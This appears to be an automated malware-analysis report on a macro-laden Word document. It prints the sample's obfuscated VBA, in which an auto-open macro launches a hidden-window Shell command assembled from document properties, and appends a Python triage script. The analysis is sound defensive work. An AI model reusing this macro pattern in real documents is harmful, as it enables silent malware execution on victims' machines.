Verdict: MALICIOUS
Risk score: 172

Malware Insights

MITRE ATT&CK
- T1059.005 Command and Scripting Interpreter: Visual Basic
- T1204.002 User Execution: Malicious File
The sample is a malicious OLE (binary Word) document carrying a VBA project. Module1 defines Sub autoopen(), so the macro runs as soon as a user opens the document with macros enabled (T1204.002, T1059.005). autoopen() calls RZwZYPM(), which hands a string to VBA.Shell$ with window style 0 (vbHide), so whatever it launches runs without a visible window; the ClamAV Doc.Macro.DollarShell signature is keyed on exactly this Shell$ call. The command string itself is not in the macro source. It is assembled at run time from ActiveDocument.CustomDocumentProperties(...) lookups, reached through the wrapper function gNEhuVVG, and from ActiveDocument.BuiltInDocumentProperties("Comments"), so the command line lives in the document's property streams rather than in the VBA. The rest of the code is padding: arithmetic assigned to variables that are never read, arrays filled with names that are never assigned (Empty at run time, so they add nothing to the concatenation), and name-mangled identifiers (220 of 267 look randomly generated). A hidden-window Shell driven by a command stored in document properties is consistent with a downloader that fetches and runs a second stage, but that cannot be confirmed from the macro alone; recovering the property values from the original document is the required next step.
Heuristics (7)

- ClamAV: Doc.Macro.DollarShell-6346616-0 (CLAMAV_DETECTION, critical): ClamAV detected this file as malware: Doc.Macro.DollarShell-6346616-0
- VBA macros detected (OLE_VBA_MACROS, medium, 2 related findings): Document contains VBA macro code
- Potential Shell call in VBA (OLE_VBA_SHELL, critical). Matched lines in script:
    ySAkVsagK = 3012 + 907 / 2725 / 6634 / 4887 - 1498 - 4304 + 3817 + 5722
    VBA.Shell$ xVYCtussSck + zZRULKRPYM + hnVxSSKxF + TZkMpdmk + UastfATh + YMPKzdM + DfYkVCgV + eXmPEanPE + dcVwWpdS + PHUHvCuTDV + LubprFx + ZSSeAkt + dfwpkaG + BVKZKkNb + ZvFFcuPA + NaKtpMrM + smmEANd + SsHTmFHpD, 0
    End Function
  The second argument, 0, is vbHide: the spawned process gets no visible window. Only xVYCtussSck is a defined function; the other names in the expression are never assigned and contribute nothing.
- AutoOpen macro (OLE_VBA_AUTOOPEN, low). Matched lines in script:
    Attribute VB_Name = "Module1"
    Sub autoopen()
    RZwZYPM
- Legacy WordBasic auto-exec macro marker (OLE_LEGACY_WORDBASIC_AUTOEXEC, medium): OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself. For this sample the rule text is stale: a VBA project was recovered (macros.bas under Extracted artifacts), and the marker duplicates OLE_VBA_AUTOOPEN, so it adds no independent evidence.
- Suspicious extracted artifact (EXTRACTED_FILE_STATIC_TRIAGE, info): One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
- Embedded URL (EMBEDDED_URL, info): One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL: http://schemas.openxmlformats.org/drawingml/2006/main, in document text (OLE body). This is the DrawingML XML namespace string, a routine artifact of Office content; nothing in the macro contacts it and it is not an indicator.
Extracted artifacts (1)
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 11672 bytes |

SHA-256 (macros.bas): 319123e9baf03c9d8af2ec2707b73e5682ce5099c0f3c07b4cbbc4b4881513b0
Detection (macros.bas)
- ClamAV: No threats found. This is the scan of the decoded VBA text; the Doc.Macro.DollarShell hit listed under Heuristics is against the OLE document itself.
- Obfuscation or payload: likely. 220 of 267 identifiers look randomly generated (e.g. 'KbzdzhnNBZy'), consistent with name-mangling obfuscation.
Preview script (first 1,000 lines of the extracted script)
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "Module1"
Sub autoopen()
RZwZYPM
End Sub
Function kNCwPPkFd()
Dim GutFDFNybds(8089)
GutFDFNybds(6809) = 4589 + 1558 + 9452 + 314 / 9108 - 6266 - 5810 + 1955 + 8037 + 3406
GutFDFNybds(5117) = 5332 + 2554 / 752 - 2938 - 4055 - 8779 + 3274 + 9423
GutFDFNybds(4342) = sHVnYaZuR
GutFDFNybds(2382) = UfNMzVwuM
GutFDFNybds(557) = xLdSpLf
GutFDFNybds(629) = vTTKYGKmuv
GutFDFNybds(2795) = CrmBcuvWC
GutFDFNybds(2405) = exEBCkAL
GutFDFNybds(4451) = pgGHFPYZdy
GutFDFNybds(2122) = gVxXHMhTM
GutFDFNybds(5029) = nTMxXxtDL
GutFDFNybds(3250) = cKcpvXG
GutFDFNybds(3999) = FxMPYCNRWe
End Function
Function gkCetzrWsg()
Dim zvDNUZB(1233)
zvDNUZB(595) = 1250 + 7842 + 986 + 4530 / 4970 / 9908 - 7757 - 3381 - 2163 + 4944
zvDNUZB(975) = tRsMZML
zvDNUZB(572) = TDYFhcgKE
zvDNUZB(709) = bMxWLzh
zvDNUZB(262) = vZVpxwdDxev
zvDNUZB(228) = XwwERktFf
zvDNUZB(81) = FttyLXGgdKD
zvDNUZB(332) = MkdhmBUTY
zvDNUZB(684) = vSCCfPHfr
zvDNUZB(806) = WXpAhFrxnd
zvDNUZB(975) = PtHxpePczMs
zvDNUZB(301) = CDLgXUKry
zvDNUZB(182) = UXMuYDaW
zvDNUZB(184) = BpCsfEcnZ
zvDNUZB(158) = DfktxzuL
zvDNUZB(303) = SvVSrGyauu
zvDNUZB(489) = MfmLRttRGDk
zvDNUZB(180) = fgFFvVrze
zvDNUZB(576) = EMZSGKM
zvDNUZB(535) = gACHwUa
zvDNUZB(761) = SHpTxZGK
zvDNUZB(644) = KbzdzhnNBZy
zvDNUZB(1105) = XfyPudbBNNM
End Function
Function hzvmYnYUkw()
Dim yyPnEeM(6298)
yyPnEeM(4531) = 1341 + 2750 + 173 + 3719 / 9165 / 2484 / 9892 - 2361 + 9574 + 6019
yyPnEeM(456) = 8690 + 3942 + 2354 + 1958 / 1337 - 6160 + 2528 + 5271 + 4760
yyPnEeM(2204) = 1384 + 4612 + 9186 + 9240 / 2710 / 4006 - 3565 + 7032
yyPnEeM(3336) = ynLcTsuK
yyPnEeM(1822) = kuugbMCnpa
yyPnEeM(1442) = gDPKYpefhfx
yyPnEeM(2591) = uXAXDsZDDBn
yyPnEeM(2934) = LUrwbKrVfF
yyPnEeM(2858) = dpeycnMTM
yyPnEeM(2780) = dRzuUFD
yyPnEeM(1901) = eGYpXwg
yyPnEeM(2508) = DyDFpzM
yyPnEeM(4870) = VhAUkzxha
yyPnEeM(135) = FyUaYZS
yyPnEeM(1148) = YyMmyhecM
yyPnEeM(2157) = YYzMytSzB
yyPnEeM(5411) = WApKTcg
yyPnEeM(2093) = PDwYmkgPCer
yyPnEeM(2462) = AhpxSZeNwZs
yyPnEeM(3939) = HrNECVA
yyPnEeM(1683) = rZPUdnYssP
yyPnEeM(509) = dtnWNFbSr
yyPnEeM(4444) = BfxMzwg
yyPnEeM(5914) = mprHLXwTCyc
yyPnEeM(4473) = bbcKDBxKh
yyPnEeM(4062) = eZPPGHpFB
yyPnEeM(1949) = ueRzgKEk
yyPnEeM(2535) = vVwXdDwuVp
yyPnEeM(923) = TAMTGzRPa
End Function
Function KkKDUAzcSw()
Dim ngeCtBrdPp(5921)
ngeCtBrdPp(1921) = 6442 + 3737 + 4511 + 458 / 6750 / 6084 / 2051 - 7772 - 9783 + 4888
ngeCtBrdPp(3344) = 4180 + 4804 + 628 / 4315 / 7064 / 7425 - 5411 + 3106 + 3633
ngeCtBrdPp(3515) = 4628 + 5814 + 8777 / 960 / 7435 - 9440 + 5848 + 5007 + 3155
ngeCtBrdPp(5548) = DzwvmaYBu
ngeCtBrdPp(5615) = btDwYCHU
ngeCtBrdPp(4139) = NzbytHV
ngeCtBrdPp(3241) = swrDKwrtL
ngeCtBrdPp(3078) = VXpHRpU
ngeCtBrdPp(2615) = pKprMaSe
ngeCtBrdPp(954) = WYBvzXcc
ngeCtBrdPp(919) = vFtVCczS
ngeCtBrdPp(2432) = UwrbAZtUSE
ngeCtBrdPp(1307) = ptawGGZTeyk
ngeCtBrdPp(3512) = TemDwAh
ngeCtBrdPp(2411) = KTfLESnWhY
ngeCtBrdPp(5264) = szwrFKdBE
ngeCtBrdPp(4510) = ryrTWZFNuz
ngeCtBrdPp(1609) = TMGMsmaMGa
ngeCtBrdPp(4054) = zkTrhfwxp
ngeCtBrdPp(4184) = EsEULEhrG
ngeCtBrdPp(5510) = hYbMcXxZKfX
ngeCtBrdPp(767) = fnsRHMvnRBa
ngeCtBrdPp(4645) = kHtsCWm
ngeCtBrdPp(99) = xvwrLRvVT
ngeCtBrdPp(1167) = dNcmgHngS
ngeCtBrdPp(5840) = wTUfXsam
ngeCtBrdPp(5655) = dBuxdDDYf
End Function
Function ZtBSGbLzXHa()
Dim XgnefYfX(9516)
XgnefYfX(1806) = 4020 + 3310 + 5251 + 793 / 1338 / 1485 / 6297 - 8729 - 7367 + 7712
XgnefYfX(6509) = 4789 + 9467 / 7692 / 2109 - 5593 - 7409 + 264 + 1815 + 9196
XgnefYfX(5975) = XUMzkLWpc
XgnefYfX(3632) = nAsuaDm
XgnefYfX(9384) = fDUkuEeFbTC
XgnefYfX(1556) = ZESzdUFxPnt
XgnefYfX(6100) = abnKyfSyc
XgnefYfX(7632) = LuCUcUywe
XgnefYfX(8951) = WHHZMWg
XgnefYfX(2840) = DLuBxeAsWC
XgnefYfX(8562) = EUvAtdDTh
XgnefYfX(2609) = nDBvYuep
XgnefYfX(9057) = sTaUYfCYCn
End Function
Function MTHskWBW()
Dim xnPMrbMtZS(336)
xnPMrbMtZS(133) = 4403 + 7978 + 475 + 8350 / 7523 / 426 - 1070 - 9824 + 4087 + 173 + 1536
xnPMrbMtZS(68) = 3832 + 3933 + 8495 + 4938 / 8767 / 7035 - 9467 + 1284 + 2041
xnPMrbMtZS(211) = cPAmfXkeAUm
xnPMrbMtZS(178) = XGehLFZg
xnPMrbMtZS(307) = MfuKnvfbFu
xnPMrbMtZS(260) = RzmDmeSUV
xnPMrbMtZS(266) = YEKbWwrfYe
xnPMrbMtZS(84) = nwMhypXGRb
xnPMrbMtZS(103) = tKxSmEFG
xnPMrbMtZS(311) = SvNfLYnp
xnPMrbMtZS(136) = rxsUDwH
xnPMrbMtZS(263) = AeuLPcBYag
xnPMrbMtZS(309) = MnWGYYS
xnPMrbMtZS(80) = ssfynVnF
xnPMrbMtZS(259) = ZnpgaHwyyVV
xnPMrbMtZS(274) = sPnrsYRYeX
xnPMrbMtZS(98) = cSWUvnG
End Function
Function BLsENXpGYz()
Dim UDDFMwKCa(7639)
UDDFMwKCa(5494) = 5811 + 8696 + 5284 / 1171 / 3578 - 9651 - 9810 + 6196 + 6645 + 2315
UDDFMwKCa(407) = 5673 + 5808 + 7830 + 2067 / 1770 - 9916 - 9128 - 6481 + 7114 + 3915 + 7022
UDDFMwKCa(4803) = EBbBnutgUS
UDDFMwKCa(265) = LAKDNNS
UDDFMwKCa(1108) = xDLFBALR
UDDFMwKCa(2633) = xgvWTUuxm
UDDFMwKCa(4807) = XAPmBFDx
UDDFMwKCa(2529) = LEYxeHhTg
UDDFMwKCa(2693) = CHWRpSPAL
UDDFMwKCa(205) = grDCMUVv
UDDFMwKCa(964) = MPSafGX
UDDFMwKCa(5626) = HgSdfAkKRyP
UDDFMwKCa(4825) = GLBbEKe
UDDFMwKCa(6645) = AMNEWKWE
UDDFMwKCa(4661) = xaFhWSzWn
UDDFMwKCa(113) = vHeHzLhSYA
UDDFMwKCa(6490) = gBWMbWzg
UDDFMwKCa(5854) = NeLKAhfupt
End Function
Public Function gNEhuVVG(GgdkCDDb)
UsLwcMzS = 2720 + 6362 / 2732 - 9969 + 9135 + 8750
VcrbvDDWhD = 1071 + 890 + 4393 + 2362 / 5778 / 7113 / 3373 - 7544 - 5488 + 9987 + 9730
caPYGWtx = 2169 + 3714 + 9995 / 1222 - 3013 - 5124 + 1642 + 6967
eEfWWnHvt = 3006 + 9888 / 6157 / 2761 - 4914 - 1069 + 5829
FnUCPYtvUr = 5387 + 4148 + 7289 / 7655 / 2024 / 4064 - 6531 + 6164
LVKkwnTKC = 9748 + 2258 / 7529 - 6294 - 1962 - 730 + 4107
UEcsuXxsEe = 765 + 2950 + 7644 / 1679 / 8212 / 5946 - 330 + 3244 + 8358
kGTxEdrncg = 3393 + 6639 + 9406 + 8283 / 1243 - 7955 + 3563 + 4760 + 7055
mFhRRStVGt = 4084 + 7375 + 1878 / 2589 - 5813 - 9849 + 9502 + 9843
NyXcevBTz = 1046 + 2685 + 2825 / 7033 / 1632 - 7047 - 5979 + 9244 + 8043
kaZwESKG = 9296 + 1100 + 2953 / 582 - 8317 - 6326 + 9500
gNEhuVVG = ActiveDocument.CustomDocumentProperties(GgdkCDDb)
End Function
Public Function xVYCtussSck()
FdrPEFmRY = 7577 + 1388 + 6678 + 694 / 8569 - 6961 - 3582 + 6068 + 5246
KxdyNfcbufL = 4593 + 1340 + 4456 / 4156 - 6970 - 9481 - 4427 + 9917 + 7370
TnNYzPu = 6027 + 3622 + 6280 + 1144 / 5230 - 6723 - 8422 + 4880 + 6647
YrwkRPynR = gNEhuVVG("wUyBNMXXeb") + gNEhuVVG("CEVbEvaaSxA") + gNEhuVVG("SLMzLZwYFb") + gNEhuVVG("EagfrcnK")
wSgmnSWBGS = 3774 + 6509 + 5301 + 3446 / 5725 - 6007 + 4369
HCYRKCGbg = gNEhuVVG("WdEXBybd") + gNEhuVVG("hGLMamrsKsx") + zZRULKRPYM + hnVxSSKxF + TZkMpdmk + UastfATh + YMPKzdM + DfYkVCgV + eXmPEanPE + dcVwWpdS + PHUHvCuTDV + LubprFx + ZSSeAkt + dfwpkaG + BVKZKkNb + ZvFFcuPA + NaKtpMrM + smmEANd + gNEhuVVG("ngzSyeYZsH") + gNEhuVVG("FRHxtHzmFVk") + gNEhuVVG("NXVHDLytKPH")
XVpGkTXnbXd = 1016 + 2593 + 3049 + 8251 / 7969 / 9052 / 1619 - 7608 - 9490 - 2226 + 603 + 3941 + 5260
VTwEbWZE = 5800 + 1476 + 4406 / 1069 / 7479 - 2765 - 9704 - 4862 + 6526 + 4739
XxAVxCWuT = HCYRKCGbg + YrwkRPynR
FXBArySBHWg = 6161 + 267 + 7245 + 2436 / 7994 - 5224 - 5154 - 63 + 5898 + 8391
EmMCKCCf = 2507 + 3207 + 9751 / 1900 - 3882 - 2053 + 5186 + 9995 + 4363
gZfTwLEL = 9487 + 4393 + 2482 / 8393 - 6254 + 4560 + 2183
DUFTSFYaz = 5364 + 6191 + 4414 + 3899 / 6857 / 2808 - 6660 + 769
xdHFCBbSEG = 3103 + 3953 + 5118 + 6288 / 151 - 8717 - 8239 + 3849
rUPSpfWD = 8447 + 9087 / 1948 / 4728 - 7672 + 1149 + 4722
vaVAnKvg = 9819 + 9581 + 3966 + 2623 / 7703 / 830 / 7653 - 6710 + 8149 + 256
EvFsFNyTfG = 6270 + 8902 / 9529 / 6963 / 2750 - 8105 - 9410 + 593
xVYCtussSck = XxAVxCWuT + ActiveDocument.BuiltInDocumentProperties("Comments") + zZRULKRPYM + hnVxSSKxF + TZkMpdmk + UastfATh + YMPKzdM + DfYkVCgV + eXmPEanPE + dcVwWpdS + PHUHvCuTDV + LubprFx + ZSSeAkt + dfwpkaG + BVKZKkNb + ZvFFcuPA + NaKtpMrM + smmEANd + kFwhrwceuA
End Function
Public Function aRaXSfYg()
SrUyracfwUA = 7256 + 1314 + 6979 / 5179 - 6445 - 4207 - 8311 + 114 + 3570
xMSEGUgRz = 715 + 7841 / 3452 - 8501 - 6759 - 3056 + 1365 + 5245
aRaXSfYg = gNEhuVVG("RGCLPXKZS") + gNEhuVVG("FLgywRpZMuW") + gNEhuVVG("cxpnaDB")
End Function
Public Function RZwZYPM()
LZKtrygzwtk = 1755 + 6462 + 7565 / 887 / 3135 - 1681 + 4876 + 1591 + 3904
ewYvkvkS = 5174 + 6200 + 5951 + 4261 / 8384 - 2998 + 2524
ySAkVsagK = 3012 + 907 / 2725 / 6634 / 4887 - 1498 - 4304 + 3817 + 5722
VBA.Shell$ xVYCtussSck + zZRULKRPYM + hnVxSSKxF + TZkMpdmk + UastfATh + YMPKzdM + DfYkVCgV + eXmPEanPE + dcVwWpdS + PHUHvCuTDV + LubprFx + ZSSeAkt + dfwpkaG + BVKZKkNb + ZvFFcuPA + NaKtpMrM + smmEANd + SsHTmFHpD, 0
End Function
Function hcbHdZsNd()
Dim URbRRmB(7188)
URbRRmB(6126) = 5055 + 9127 + 5006 + 9838 / 5370 / 5119 - 9603 + 6664 + 2288 + 8624
URbRRmB(3229) = 1532 + 743 + 5929 / 7694 - 7636 - 7408 + 4299 + 5770 + 6787
URbRRmB(6963) = ehLeeYNmmtp
URbRRmB(4043) = TmgknXuXEge
URbRRmB(3450) = XrucZkwsG
URbRRmB(3450) = wxVdkAcM
End Function
Function byxKrsP()
Dim TuVugTBm(7029)
TuVugTBm(2334) = 2854 + 4638 / 6949 / 9004 - 8133 - 533 + 9144
TuVugTBm(2750) = 2210 + 2636 / 737 / 4872 / 4952 - 664 - 973 - 7517 + 762 + 8276
TuVugTBm(1904) = 123 + 2187 / 894 / 7937 / 7440 - 8845 - 9684 + 511
TuVugTBm(5763) = NsUnxWWP
TuVugTBm(2286) = cFRzePKFE
TuVugTBm(3452) = TuYRWHspyv
TuVugTBm(5564) = mWTapcP
End Function
Function uhsKeELBWdw()
Dim yCGkvAkNau(8656)
yCGkvAkNau(5544) = 5092 + 4682 / 2656 / 7695 - 7626 + 6820
yCGkvAkNau(1349) = 7166 + 3911 / 1238 / 1993 / 9922 - 9681 - 9220 - 1899 + 5644
yCGkvAkNau(2178) = ZMrzFSc
yCGkvAkNau(1694) = WTYYMAP
End Function
Function vXehZBbbC()
Dim HneKkETtN(7102)
HneKkETtN(2853) = 474 + 5904 + 9986 / 3660 / 2283 / 5792 - 8237 + 2671
HneKkETtN(3555) = 554 + 7790 + 9944 / 6878 - 1352 + 4792 + 8776 + 7263
HneKkETtN(7046) = 2103 + 61 / 9900 - 1738 - 3868 - 2540 + 2885
HneKkETtN(4464) = YssFpBMD
HneKkETtN(3772) = aRYDxANAx
HneKkETtN(4129) = gBGtFCWF
HneKkETtN(1011) = CMUnhYhgF
End Function
Function zCYDVTa()
Dim KHNKTbtxL(4701)
KHNKTbtxL(3786) = 8615 + 4832 + 8437 / 1464 / 2395 / 303 - 3739 + 8697 + 4831
KHNKTbtxL(1102) = 865 + 5430 / 7707 / 8879 / 2877 - 5984 - 5452 + 2945 + 8147 + 384
KHNKTbtxL(2907) = 4536 + 9128 + 5917 + 1260 / 6081 - 9327 + 8976 + 3155 + 780
KHNKTbtxL(2696) = DgTNhVS
KHNKTbtxL(1136) = LtcRUcwLYa
KHNKTbtxL(174) = ektWRtdvv
KHNKTbtxL(2919) = CarmsKt
End Function
Function LVVccAfV()
Dim suMsDtDbn(5913)
suMsDtDbn(4587) = 8135 + 2404 + 9218 / 1351 / 2661 / 8814 - 4307 - 8060 - 7059 + 8666 + 1424 + 1148
suMsDtDbn(5433) = 7504 + 7477 + 5421 / 131 / 7685 / 9264 - 4351 - 1177 - 2544 + 2530 + 7718 + 2828
suMsDtDbn(5679) = 6449 + 5223 / 2370 / 1922 - 6517 - 6494 + 526 + 5663 + 4948
suMsDtDbn(603) = TXbwczkfuG
suMsDtDbn(826) = RBaMktLzZn
suMsDtDbn(1030) = ktTaHbmhUNH
suMsDtDbn(4809) = BNbhRfS
End Function
Function NvKzRMyx()
Dim RhFvhWYh(1174)
RhFvhWYh(338) = 1001 + 4973 + 1658 / 1649 / 9412 - 5265 - 3843 - 6602 + 4711 + 8845
RhFvhWYh(849) = 9743 + 3461 + 2269 / 8616 / 3963 - 8304 - 1059 + 5153 + 3893
RhFvhWYh(1016) = 4112 + 6455 / 1215 / 3667 / 9229 - 5497 + 5001 + 2548 + 1493
RhFvhWYh(1053) = bbvpwbbpp
RhFvhWYh(1083) = eTLZxhhUs
RhFvhWYh(445) = VWCLwHa
RhFvhWYh(996) = VvYPdvMgSkk
End Function
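To make the summary above checkable rather than asserted, here is an added Python triage script (my own code, not part of the analyzer, oletools or the sample) that runs two of the checks the report applies to macros.bas: the random-identifier ratio, and a trace from the Shell call back to the document properties the command string is built from. The VBA inside it is a constructed excerpt that keeps the sample's structure (the gNEhuVVG wrapper around CustomDocumentProperties, the Comments lookup, the hidden-window Shell$ in RZwZYPM) but is not the full 11672-byte file, so its counts differ from the report's 220 of 267; the randomness thresholds are my own choices and do not reproduce the analyzer's rule.

```python
"""Static triage of a name-mangled VBA macro: identifier randomness plus a
trace of what feeds the Shell call. Added example, stdlib only. SAMPLE_VBA is
a constructed excerpt mirroring the extracted macros.bas, not the full file."""
import re

SAMPLE_VBA = r'''
Attribute VB_Name = "Module1"
Sub autoopen()
    RZwZYPM
End Sub
Public Function gNEhuVVG(GgdkCDDb)
    UsLwcMzS = 2720 + 6362 / 2732 - 9969 + 9135 + 8750
    gNEhuVVG = ActiveDocument.CustomDocumentProperties(GgdkCDDb)
End Function
Public Function xVYCtussSck()
    YrwkRPynR = gNEhuVVG("wUyBNMXXeb") + gNEhuVVG("CEVbEvaaSxA")
    HCYRKCGbg = gNEhuVVG("WdEXBybd") + zZRULKRPYM + hnVxSSKxF
    XxAVxCWuT = HCYRKCGbg + YrwkRPynR
    xVYCtussSck = XxAVxCWuT + ActiveDocument.BuiltInDocumentProperties("Comments") + kFwhrwceuA
End Function
Public Function RZwZYPM()
    ySAkVsagK = 3012 + 907 / 2725 / 6634 / 4887 - 1498 - 4304 + 3817 + 5722
    VBA.Shell$ xVYCtussSck + zZRULKRPYM + hnVxSSKxF + SsHTmFHpD, 0
End Function
'''

STRING_RE = re.compile(r'"[^"]*"')
IDENT_RE = re.compile(r'\b[A-Za-z_]\w*\b')
FUNC_RE = re.compile(
    r'^\s*(?:Public\s+|Private\s+)?(?:Function|Sub)\s+(\w+)\s*\(([^)]*)\)(.*?)'
    r'^\s*End\s+(?:Function|Sub)', re.S | re.M)
SHELL_RE = re.compile(r'(?:VBA\.)?Shell\$?\s+(.+?),\s*(\d+)\s*$', re.M)
# VBA keywords and object-model names: not attacker-chosen, so not scored.
KNOWN = {"attribute", "vb_name", "sub", "end", "function", "public", "private",
         "dim", "vba", "shell", "activedocument", "customdocumentproperties",
         "builtindocumentproperties"}
# Second argument of Shell(): the vbAppWinStyle constants.
WINDOW_STYLES = {0: "vbHide", 1: "vbNormalFocus", 2: "vbMinimizedFocus",
                 3: "vbMaximizedFocus", 4: "vbNormalNoFocus", 6: "vbMinimizedNoFocus"}


def identifiers(src):
    """Unique attacker-chosen identifiers, with string literals stripped first."""
    seen = []
    for tok in IDENT_RE.findall(STRING_RE.sub('""', src)):
        if tok.lower() not in KNOWN and tok not in seen:
            seen.append(tok)
    return seen


def looks_random(name):
    """Heuristic (my thresholds): camelCase puts a capital only at a word start,
    so two adjacent capitals, or a consonant run of 5+, mark a generated name.
    Acronyms are a known false positive."""
    if len(name) < 6 or name == name.lower() or name == name.upper():
        return False
    upper_pairs = sum(1 for a, b in zip(name, name[1:]) if a.isupper() and b.isupper())
    longest_run = max((len(r) for r in re.findall(r'[^aeiouAEIOU_\d]+', name)), default=0)
    return upper_pairs >= 1 or longest_run >= 5


def score_identifiers(src):
    """(random-looking, total) over the unique identifiers in src."""
    names = identifiers(src)
    return sum(looks_random(n) for n in names), len(names)


def shell_call(src):
    """(argument expression, window style) of the first Shell call, else None."""
    m = SHELL_RE.search(src)
    return (m.group(1).strip(), int(m.group(2))) if m else None


def property_sources(src):
    """Walk the call graph from the Shell argument and list every document
    property the string is built from, in source order. A function whose
    parameter goes straight into CustomDocumentProperties is a lookup wrapper."""
    funcs = {name: (params.strip(), body) for name, params, body in FUNC_RE.findall(src)}
    wrappers = [n for n, (p, b) in funcs.items()
                if p and re.search(r'CustomDocumentProperties\(\s*%s\s*\)' % re.escape(p), b)]
    call = shell_call(src)
    if call is None:
        return []
    todo = [t for t in IDENT_RE.findall(call[0]) if t in funcs]
    seen, sources = set(), []
    while todo:
        fn = todo.pop(0)
        if fn in seen:
            continue
        seen.add(fn)
        body = funcs[fn][1]
        for w in wrappers:
            sources += [("CustomDocumentProperties", p)
                        for p in re.findall(re.escape(w) + r'\("([^"]*)"\)', body)]
        sources += [("BuiltInDocumentProperties", p)
                    for p in re.findall(r'BuiltInDocumentProperties\("([^"]*)"\)', body)]
        todo += [t for t in IDENT_RE.findall(body) if t in funcs and t not in seen]
    return sources


if __name__ == "__main__":
    rnd, total = score_identifiers(SAMPLE_VBA)
    expr, style = shell_call(SAMPLE_VBA)
    print(f"{rnd} of {total} identifiers look randomly generated")
    print(f"Shell argument: {expr}  (window style {style} = {WINDOW_STYLES.get(style)})")
    for kind, prop in property_sources(SAMPLE_VBA):
        print(f"  string built from {kind}({prop!r})")
```

The script, like the report, cannot recover the command line itself, because the property values are not in the VBA. They sit in the OLE property-set streams of the original .doc: Comments in \x05SummaryInformation, and the custom properties in the user-defined section of \x05DocumentSummaryInformation. Dumping those streams (olefile can open them) and concatenating the values in the order property_sources() reports is the step that turns this report's "likely downloader" into a verified command line, and the vbHide window style is why a user who enabled macros would see nothing happen.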